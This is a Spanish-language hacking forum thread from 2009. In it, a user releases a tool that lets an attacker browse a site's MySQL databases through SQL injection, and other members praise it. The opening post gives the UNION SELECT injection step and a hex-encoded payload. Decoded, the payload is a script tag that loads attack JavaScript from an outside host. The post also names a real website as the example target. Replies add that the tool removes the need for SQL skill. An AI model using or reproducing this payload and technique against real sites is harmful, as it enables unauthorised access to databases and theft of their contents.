elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
28 Mayo 2012, 05:49  


Tema destacado: Personaliza-Escoge el diseño del foro que más te guste.

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits
| | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | |-+  MySQLi | General Inejction Explorer | By PonyMagic		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: MySQLi | General Inejction Explorer | By PonyMagic  (Leído 2,693 veces)
Pony-Magic

Desconectado Desconectado

Mensajes: 36



Ver Perfil
MySQLi | General Inejction Explorer | By PonyMagic
« en: 13 Diciembre 2009, 00:28 »
General Injection Explorer 3.0
by PonyMagic

[?] Que es?
Basicamente es un explorador de bases de datos MySQL via SQLi, "incrustado" en la inyeccion.

[!] Que tiene la version 3.0?
  • Codeado desde 0.
  • Bypasseo de "illegal operation", y limite de group_concat_max_len.
  • Mejor manejo de CSS && DIVS.
  • Peticiones realizadas con AJAX.
  • Nueva forma de ver tablas, MUCHO mas ordenadas.

[?] Como se usa?
En una SQLi, unis otro select y marcas las columnas ( id=-1 union select 1,2,3,4,5 )
En un valor que printee (que se muestre en la web), simplemente copias y pegas el codigo de la GIE.

Código:
(0x3c736372697074207372633d22687474703a2f2f7669727475782e636f6d2e61722f4749452f5f2e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e)

Ejemplo:
adegasgalegas.es SQLi
adegasgalegas.es GIE SQLi




Injeccion con General Injection Explorer 3.0

Luego, se navegan las bases de datos, usando ese "cuadradito" como un mini-phpmyadmin :P como se ve en el siguiente [.gif]:

  • Gracias a virtux por hostear, acá tienen el código y el link:
Link JS
Link Paste2 [Highlight]
En línea
WHK
吴阿卡
Moderador
***
Desconectado Desconectado

Mensajes: 4.113


The Hacktivism is not a crime


Ver Perfil WWW
Re: MySQLi | General Inejction Explorer | By PonyMagic
« Respuesta #1 en: 13 Diciembre 2009, 03:28 »
Está super bueno, me gustó me gustó me gustó  :D

PD:
Donde dice:
Código
document.write("
 background: url(
  'http://www.SPAM(137)/blogs/themes/blackcyan/imagenes/bg.jpg'
 ) #000;z-index:1002;overflow: auto;}
"); // background

Podrías apuntar hacia otra web? xD ya que cuando se incluya esa imagen la referencia de la inyección se enviará a su web dejando en su log de acceso las inyecciones que alguien podría encontrar y utilizar con este script.

A mi me gustaría mucho si pudieras reemplazar el buffer de las imagenes con string en base64 y data/*; o simplemente hacerlo sin imagenes y evitar la dependencia de inclusiones externas.
« Última modificación: 13 Diciembre 2009, 03:33 por WHK » En línea
Mi foro Ultra Off-Topics: http://whk.drawcoders.com/foro/

Gracias a todos! Good bye!
Pony-Magic

Desconectado Desconectado

Mensajes: 36



Ver Perfil
Re: MySQLi | General Inejction Explorer | By PonyMagic
« Respuesta #2 en: 13 Diciembre 2009, 04:23 »
gracias por el dato, lo voy a tener en cuenta!
si alguien tiene alguna critica "constructiva" o no   :P
por favor que comente, asi la proxima queda mejor  :)
En línea
braulio--
Wiki

Desconectado Desconectado

Mensajes: 889


Imagen recursiva


Ver Perfil WWW
Re: MySQLi | General Inejction Explorer | By PonyMagic
« Respuesta #3 en: 13 Diciembre 2009, 14:58 »
Es la mejor herramienta para estas labores que he visto.
Tuviste una idea impresionante  ;-) ;-) ;-)
En línea

xassiz_

Desconectado Desconectado

Mensajes: 273


Ich werde dich töten..


Ver Perfil WWW
Re: MySQLi | General Inejction Explorer | By PonyMagic
« Respuesta #4 en: 13 Diciembre 2009, 16:37 »
Increíble ;-)
En línea


YXVuIGVyZXMgbWF0YWRvIHBhcmEgcG9uZXJ0ZSBhIGRlc2NpZnJhciBlc3RvIHhE
fede_cp


Desconectado Desconectado

Mensajes: 526


"porque pensar nunca fue entender"


Ver Perfil WWW
Re: MySQLi | General Inejction Explorer | By PonyMagic
« Respuesta #5 en: 13 Diciembre 2009, 18:07 »
sisi!, esta muy buena, genial.

segui así



saludos
En línea
somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
Vaati

Desconectado Desconectado

Mensajes: 229


NULL


Ver Perfil
Re: MySQLi | General Inejction Explorer | By PonyMagic
« Respuesta #6 en: 13 Diciembre 2009, 23:31 »
Grozo!!!
Ahora no necesitas conocimientos de mysql para hacer inyecciones :P

@WHK:
Te pregunto por ignorante...
Que es el buffer de imagen? Y que necesidad para que este cifrado?
En línea
YST


Desconectado Desconectado

Mensajes: 963


I'm you


Ver Perfil WWW
Re: MySQLi | General Inejction Explorer | By PonyMagic
« Respuesta #7 en: 14 Diciembre 2009, 02:37 »
Cita de: Vaati en 13 Diciembre 2009, 23:31
Grozo!!!
Ahora no necesitas conocimientos de mysql para hacer inyecciones :P

@WHK:
Te pregunto por ignorante...
Que es el buffer de imagen? Y que necesidad para que este cifrado?

cifra la imagen en base64 y se la pasa al firefox pàra que la muestre :P Sin necesidad de sacarla de alguna web ;)
En línea


Yo le enseñe a Kayser a usar objetos en ASM
kamsky
Colaborador
***
Desconectado Desconectado

Mensajes: 2.210


Como no sabían que era imposible, lo hicieron...


Ver Perfil
Re: MySQLi | General Inejction Explorer | By PonyMagic
« Respuesta #8 en: 14 Diciembre 2009, 11:21 »
Citar
cifra la imagen en base64
Más que cifrar, codificar
En línea
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!
YST


Desconectado Desconectado

Mensajes: 963


I'm you


Ver Perfil WWW
Re: MySQLi | General Inejction Explorer | By PonyMagic
« Respuesta #9 en: 14 Diciembre 2009, 20:14 »
Cita de: kamsky en 14 Diciembre 2009, 11:21
Citar
cifra la imagen en base64
Más que cifrar, codificar

Toda la razón kamsky ;)
En línea


Yo le enseñe a Kayser a usar objetos en ASM
Nakp
casi es
Ex-Staff
*
Desconectado Desconectado

Mensajes: 6.334

he vuelto :)


Ver Perfil WWW
Re: MySQLi | General Inejction Explorer | By PonyMagic
« Respuesta #10 en: 14 Diciembre 2009, 21:10 »
muy bueno xD aunque por el título pense que vulnerabas mysqli de php xDDD no se, me imagine las prepared statements o algo asi jaja
En línea
Ojo por ojo, y el mundo acabará ciego.
OzX


Desconectado Desconectado

Mensajes: 397


[NuKe] Team


Ver Perfil WWW
Re: MySQLi | General Inejction Explorer | By PonyMagic
« Respuesta #11 en: 14 Diciembre 2009, 21:12 »
el concepto lo encontre genial.
Buen proyecto bro.

Saludos¡
En línea
HTTP://FORO.UNDERSECURITY.NET
alexkof158


Desconectado Desconectado

Mensajes: 413


LOL


Ver Perfil
Re: MySQLi | General Inejction Explorer | By PonyMagic
« Respuesta #12 en: 15 Diciembre 2009, 10:07 »
me siento feliz al haberme registrado en esta comunidad, llegan sorprendentes aportes cada dia,DIOSSSSSSSSSSSSSSSSSSSSSSSSS


excelente trabajo  ;-)
En línea
"noproxy"
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines